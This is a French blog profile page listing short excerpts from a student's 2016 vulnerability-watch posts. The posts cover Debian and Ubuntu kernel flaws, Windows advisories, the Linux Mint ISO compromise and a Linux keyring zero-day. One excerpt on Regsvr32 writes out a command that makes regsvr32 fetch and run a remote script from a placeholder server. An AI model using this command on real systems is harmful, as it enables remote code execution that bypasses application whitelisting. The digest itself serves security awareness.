Pas encore inscrit ? Creez un Overblog!

Créer mon blog
Kevin Petitpre

Kevin Petitpre

Ses blogs

Synthese des veilles technologiques

Synthese de la mission 1 : Veille Technologique
Kevin Petitpre Kevin Petitpre
Articles : 15
Depuis : 26/04/2016
Categorie : Emploi, Enseignement & Etudes

Articles à découvrir

Debian 07/03/2016

Debian De multiples vulnérabilités ont été corrigées dans le noyau linux de debian Les systemes affectés Debian Wheezy versions antérieures à 3.2.73-2+deb7u3 Debian Jessie versions antérieures à 3.16.7-ckt20-1+deb8u4 Les conséquences de cette faille sont déni de service à distance atteinte à l'intégrité des données atteinte à la c

Faille Ubuntu 02/02/16

Ubuntu De multiples vulnérabilités ont été corrigées dans le noyau Linux d'Ubuntu. Les systems affectés sont : Ubuntu 12.04 LTS Ubuntu 14.04 LTS Ubuntu 15.04 Ubuntu 15.10 Ubuntu 15.10 pour Raspberry Pi 2 OpenJDK 6 pour Ubuntu 12.04 LTS OpenJDK 7 pour Ubuntu 14.04 LTS, Ubuntu 15.04 et Ubuntu 15.10 Les conséquences sont : exécution de code ar

Faille Windows 26/04/2016 Regsvr32

Regsvr32 est un utilitaire en ligne de commande qui permet d'inscrire ou de désinscrire dans le registre Windows des DLL ou des contrôles activeX il gére aussi les proxys,les redirections et l' HTTPS regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll La commande permet à Regsvr32 d'accepter une URL pointant vers un script sans besoin d'avoi

Faille Ubuntu 23/02/2016

Ubuntu De multiples vulnérabilités ont été corrigées dans le noyau Linux d'Ubuntu Les systèmes affectés sont : Ubuntu 12.04 LTS Ubuntu 14.04 LTS Ubuntu 15.10 Ubuntu 15.10 (Raspberry Pi 2 Les conséquences sont : déni de service atteinte à la confidentialité des données élévation de privilèges Source : http://www.cert.ssi.gouv.fr/site/

Faille Debian 25/01/2016

La faille est apparue avec la version 15.7 des pilotes puis a disparu avec la 15.9. La faille, estampillée CVE-2015-7724, faille résidant au sein de fglrx et permettait une escalade des privilèges via une attaque contre la mémoire partagée Posix, à cause de permissions non sécurisées. Source : http://www.nextinpact.com/news/98224-debian-8-3

Faille Ubuntu 26/04/2016

La nouvelle version d’Ubuntu 16.04 LTS a introduit récemment un nouveau format de gestion de paquets, baptisé Snap que Canonical présentait comme plus sécurisé et plus simple à utiliser que le système précédent un risque sur les versions d’Ubuntu utilisant le système d’affichage X11, ce qui est le cas de la version desktop d’Ubunt

Faille Linux Mint 21/02/2016

Les isos de linux mint ont été inféctés mais le responsable du projet a remis en place les liens vers les isos officiels Les signatures MD5 des ISO Mint officiels sont les suivantes : 6e7f7e03500747c6c3bfece2c9c8394f linuxmint-17.3-cinnamon-32bit.iso e71a2aad8b58605e906dbea444dc4983 linuxmint-17.3-cinnamon-64bit.iso 30fef1aa1134c5f3778c77c4417f

Faille windows 13/04/2016

Windows : De multiples vulnérabilités ont été corrigées dans Microsoft Windows. Les systèmes affectés sont Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 Windows 8.1 Windows Server 2012 Windows Server 2012 R2 Windows RT 8.1 Windows 10 Les conséquences de cette faille sont : exécution de code arbitraire à distance déni

Faille Debian 06/01/2016

Debian De multiples vulnérabilités ont été corrigées dans le noyau linux de debian Les systèmes affectés : Debian Wheezy versions antérieures à 3.2.73-2+deb7u2 Debian Jessie versions antérieures à 3.16.7-ckt20-1+deb8u2 Debian Sid versions antérieures à 4.3.3-3 Les conséquences de cette faille sont déni de service à distance déni de

Faille 0 day Linux 22/01/2016

Présente au niveau du service keyrings facility, la faille semblait présenter un risque tout relatif avec des distributions Linux car assimilable à une vulnérabilité de type élévation de privilège en local. L'alerte était par contre plus problématique pour Android.